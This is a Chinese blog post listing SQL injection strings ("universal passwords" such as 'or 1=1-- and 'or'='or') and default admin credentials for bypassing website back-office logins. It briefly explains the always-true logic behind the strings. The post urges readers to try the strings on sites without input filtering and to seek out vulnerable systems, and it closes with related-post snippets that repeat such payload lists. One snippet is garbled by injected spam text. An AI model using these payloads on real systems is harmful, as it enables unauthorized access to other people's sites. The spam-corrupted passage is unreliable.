网站后台万能密码就是在用户名与密码处都写入下列字符,如果知道管理员帐号的话直接添帐号,效果会更好。
例如我们要利用第一条就是:
用户名:"or “a”="a
密码:"or “a”="a

1:"or “a”="a
2: ‘.).or.(’.a.’=’.a
3:or 1=1–
4:‘or 1=1–
5:a’or’ 1=1–
6:"or 1=1–
7:‘or.‘a.’=‘a
8:“or”="a’=‘a
9:‘or’’=’
10:‘or’=‘or’

原理都是利用SQL语法来利用注入,其实这也是注入的一种,都是因为提交字符未加过滤或过滤不严而导致的。
其实万能是没有的,默认是很多的。
admin
admin
admin
admin888
少数ASP网页后面登陆时可以用密码1’or’1’=‘1(用户名用admin等试)登陆成功。这一般也是SQL注入的第一课,原理涉及到SQL语句……验证登陆时,如果密码=输入的密码,那么登陆成功,把1’ or ‘1’='1带入即“如果密码=1或者1=1那么登成功”由于1=1恒成立,且“密码=1”与“1=1”是逻辑或的关系,则整句为TRUE,即登陆成功。这样说懂不?
其实后台万能登陆密码这个称号真的不那么专业,或许叫做“后台验证绕过语句”还好些,不过前者叫得普遍些。
这个语句就是’xor

xor估计很多人都知道,或者听说过,不就是异或么,他和or以及and都是一样的,但是or进行的是或运算,and进行的是与运算,异或xor则是不等的则是真,即比较的两个值不相同的就对,相同的就错,我搜了一下网上,几乎没有过滤参数,可以用经典’or’='or’进去的,‘xor都可以进去,大家可以尝试一下。
对网站万能密码’or’='or’的浅解
‘or’='or’漏洞是一个比较老的漏洞了,主要是出现在后台登录上,利用这个漏洞,我们可以不用输入密码就直接进入系统的后台.它出现的原因是在编程时逻辑上考虑不周,同时对单引号没有进行过滤,从而导致了漏洞的出现.先给大家简单介绍下漏洞的原理吧,只要大家搞懂了原理,就可以自己去找这样漏洞的系统了。

web后台常用的万能密码相关推荐

  1. 后台登入万能密码合集

    asp aspx万能密码 1: "or "a"="a    2: ')or('a'='a    3:or 1=1--    4:'or 1=1--    5:a ...

  2. 新浪博客登录php发,PHP的万能密码登陆

    说实话如果一个网圣元奶粉站的前台都是注入漏洞圣元优博,那么凭经验,万能密圣元优博码进后台的几率基本上优聪百. 可是优聪. 可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜 ...

  3. 网站后台万能密码/10大常用弱口令

    方法 / 步骤 一: 手动探测 先手动猜测几个可能的弱口令,主要是判断站点有没有做登录失败次数限制,若没有限制,则可以使用工具字典工具进行测试 二: 使用字典测试 2.1 字典生成思路 国内很多安全测 ...

  4. SQL手工注入原理万能密码及默认密码登陆后台

    SQL手工注入原理: 下面就是比较笨的方法了==    一个一个试 (* ̄rǒ ̄) 针对于.asp后缀网 + ?id_  在后面加入下面代码,返回正确那就是无注入点,反正就是有注入点 一.什么是SQL ...

  5. 万能密码:‘or 1=1-- 实战SQL注入,秒破后台

    主要是没有对登录密码的字符串进行参数化和过滤,所以导致网站可以直接用"万能密码"进行突破登录 仅供学习交流 这是某同学做的网站,今天无聊打开了,并帮他进行测试一下 看到这个后台,感 ...

  6. web安全—万能密码登录(跳过密码验证)

    什么是万能密码登录呢,我们可以理解为绕过密码验证.通过构造语句来直接绕过登录的验证. 这里我们举dvwa的靶场为例子 我们打开靶场,看到一个登录页面,上面显示让我们输入用户密码,由于我们不知道他的账号 ...

  7. .NET版Web后台快速开发框架 Coldairarrow

    来源:寒空飞箭 链接:http://www.cnblogs.com/coldairarrow/p/9626691.html 一.简介 本框架旨在为.NET开发人员提供一个Web后台快速开发框架,采用本 ...

  8. 基于Token的WEB后台认证机制

    转载自:基于Token的WEB后台认证机制 几种常用的认证机制 HTTP Basic Auth HTTP Basic Auth简单点说明就是每次请求API时都提供用户的username和passwor ...

  9. nunito字体_dcat-admin: 使用很少的代码快速构建一个功能完善的高颜值后台系统,内置丰富的后台常用组件,开箱即用,让开发者告别冗杂的HTML代码。...

    Dcat Admin是一个基于laravel-admin二次开发而成的后台系统构建工具,只需很少的代码即可快速构建出一个功能完善的高颜值后台系统.内置丰富的后台常用组件,开箱即用,让开发者告别冗杂的H ...

最新文章

  1. CloudHub概述
  2. 刻意练习:LeetCode实战 -- Task18. 正则表达式匹配
  3. mysql commit慢_mysql autocommit问题导致的gtid同步变慢
  4. 放弃OT了,找了个新框架ThinkCMF
  5. github page hexo博客gitee_hexo + github 博客搭建
  6. HDU - 4821 String(字符串哈希+优化)
  7. IHttpModule接口
  8. Python教程:Python中的for 语句
  9. 简明易懂的c#入门指南_统计假设检验的简明指南
  10. nginx rewrite php参数,Nginx rewrite伪静态配置参数详解
  11. hdu 2069 1 5 10 25 50 这几种硬币 一共100个(母函数)
  12. 在用户空间加载和卸载驱动
  13. 文件完整性的检测与监控
  14. GF6 WFV卫星视角影响、与Sentinel2协同及精度分析
  15. U盘文件恢复,3个方法恢复教程
  16. C++猜数字小游戏1.0.1版猜数字1.1---国庆特版(双人战斗版)
  17. 翔工作室网站策划逻辑图:(online.cumt.edu.cn)
  18. web前端-综合应用案例-简历表页面的制作-educoder
  19. IIS配置问题:WCF服务打开svc文件报错:请求的内容似乎是脚本,因而将无法由静态文件处理程序来处理
  20. java将“2018年4月8日”转换成正常日期:2018年04月08日

热门文章

  1. UE4像素流送教程【Pixel Streaming】
  2. Comparator接口
  3. 追踪IP地址你需要这几款工具加持
  4. 我的世界服务器精灵模型文件在哪,[娱乐|机制]PokemonInfo — GUI界面查看精灵信息 , 精灵变照片[1.12.2] - 服务端插件 - Minecraft(我的世界)中文论坛 -...
  5. D1. Great Vova Wall (Version 1)
  6. CodeChef Chef and Digit Jumps 题解
  7. windows 10 多用户会话登陆
  8. Word-已经设置多级列表的情况下下,引用题注还是从“0-1”开始
  9. [UE4]android打包时,设备上弹出错误:Failed to open descriptor file uproject
  10. 阿里云平台的DataWorks使用教程